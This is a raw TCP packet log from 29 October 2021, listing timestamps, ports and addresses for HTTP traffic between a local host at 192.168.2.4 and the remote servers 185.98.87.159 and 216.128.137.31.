Oct 29, 2021 20:49:30.985505104 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985533953 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985627890 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985646009 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985663891 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985676050 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985682011 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985737085 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985755920 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985755920 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985781908 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011457920 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011478901 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011492968 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011508942 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011548996 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011619091 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011636972 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011637926 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011656046 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011672020 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011683941 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011703014 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011719942 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011732101 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011755943 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011811018 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011840105 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011857033 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011872053 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011881113 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011888981 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011907101 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011923075 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011940002 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.011940002 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011957884 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011972904 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.011990070 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.012006044 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.012018919 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.012063026 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.018037081 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.018055916 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.018074989 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.018093109 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.018105030 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.018197060 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.058155060 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058199883 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058218956 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058231115 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058243036 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058247089 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.058255911 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058284998 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058298111 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058345079 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058392048 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058408976 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058469057 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058485985 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058500051 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.058502913 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058521986 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058538914 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058553934 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058571100 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058589935 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058604002 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.058604956 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058657885 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058660984 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.058676958 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.058717012 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.063957930 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.063978910 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.064085960 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.064222097 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.064240932 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.064260006 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.064276934 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.064287901 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.064323902 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.064348936 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.064415932 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104427099 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104449987 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104466915 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104484081 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104500055 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104526997 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104543924 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104552984 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104562998 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104578018 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104588032 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104625940 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104726076 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104743004 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104760885 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104784012 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104799986 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104816914 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104821920 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104835033 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104876995 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104888916 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104908943 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104926109 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104939938 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104959011 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.104979038 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.104989052 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.105026960 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.110647917 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110670090 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110739946 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.110884905 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110914946 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110934019 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110953093 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110969067 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.110971928 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.110986948 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.111001015 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.111042023 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.111206055 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150659084 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150718927 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150758028 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150799990 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150840998 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150870085 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150902987 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150943041 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.150979996 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151019096 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151057005 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151097059 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151135921 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151176929 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151216984 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151289940 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151328087 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151568890 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.151611090 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157013893 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157083035 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157144070 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157215118 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157320023 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157381058 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157442093 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157501936 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157565117 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157625914 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.157677889 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.162086964 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197410107 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197498083 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197520971 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197542906 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197556019 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197586060 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197664022 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197689056 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197712898 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197735071 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197742939 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197760105 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197782993 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197798014 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197823048 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197841883 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197845936 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197871923 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197892904 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197896004 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197920084 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197938919 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197943926 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197968960 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.197987080 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.197993040 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198018074 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198034048 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.198040962 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198064089 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198076963 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.198086023 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198107958 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198127031 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.198131084 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198153973 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198172092 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.198175907 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198199034 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198211908 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.198224068 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198240042 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.198270082 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.241442919 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.241471052 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.241594076 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244247913 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244277954 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244302988 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244326115 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244340897 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244425058 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244474888 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244498968 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244522095 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244545937 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244601011 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244612932 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244652033 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244693041 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244712114 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244714975 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244740963 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244765997 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244784117 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244790077 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244815111 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244837046 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244875908 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244898081 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.244899988 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244925976 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244947910 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244970083 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.244999886 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245008945 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.245040894 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245043039 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.245064974 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245088100 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245111942 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245122910 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.245136023 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245157957 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245177984 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.245179892 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245203972 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245223045 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.245228052 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.245362043 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.292236090 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.292263985 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.292428970 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.292463064 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.292486906 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.292531013 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:31.292548895 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.292589903 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.292630911 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:31.344947100 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.166208982 CEST	49769	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.219944000 CEST	80	49769	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.220253944 CEST	49769	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.220673084 CEST	49769	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.220690966 CEST	49769	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.274143934 CEST	80	49769	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.274177074 CEST	80	49769	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.294075012 CEST	80	49769	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.294194937 CEST	49769	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.294476986 CEST	49769	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.325701952 CEST	49770	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.348107100 CEST	80	49769	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.378000975 CEST	80	49770	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.378130913 CEST	49770	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.378335953 CEST	49770	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.378353119 CEST	49770	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.462199926 CEST	80	49770	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.464715958 CEST	49770	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.465097904 CEST	49770	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:33.517493963 CEST	80	49770	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:33.547153950 CEST	49771	80	192.168.2.4	216.128.137.31
Oct 29, 2021 20:49:36.706501007 CEST	49771	80	192.168.2.4	216.128.137.31
Oct 29, 2021 20:49:42.706991911 CEST	49771	80	192.168.2.4	216.128.137.31
Oct 29, 2021 20:49:49.920948982 CEST	49772	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:49.973206043 CEST	80	49772	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:49.973416090 CEST	49772	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:49.973531008 CEST	49772	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:49.973553896 CEST	49772	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.053956985 CEST	80	49772	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.054147005 CEST	49772	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.057466030 CEST	49772	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.109685898 CEST	80	49772	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.428800106 CEST	49774	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.482503891 CEST	80	49774	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.482665062 CEST	49774	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.482923031 CEST	49774	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.482948065 CEST	49774	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.536427021 CEST	80	49774	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.562341928 CEST	80	49774	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.562474012 CEST	49774	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.562871933 CEST	49774	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.616292953 CEST	80	49774	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.635940075 CEST	49775	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.690239906 CEST	80	49775	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.690366030 CEST	49775	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.690589905 CEST	49775	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.690610886 CEST	49775	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.775800943 CEST	80	49775	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.775892019 CEST	49775	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.775928020 CEST	49775	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.805382013 CEST	49776	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.829550028 CEST	80	49775	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.857969046 CEST	80	49776	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.858124018 CEST	49776	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.858268023 CEST	49776	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.858280897 CEST	49776	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.910986900 CEST	80	49776	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.934794903 CEST	80	49776	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:50.934875011 CEST	49776	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.934953928 CEST	49776	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.966311932 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:50.987445116 CEST	80	49776	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.018106937 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.018209934 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.018378973 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.018390894 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.097420931 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097445965 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097462893 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097480059 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097496986 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097513914 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097526073 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.097529888 CEST	80	49777	185.98.87.159	192.168.2.4
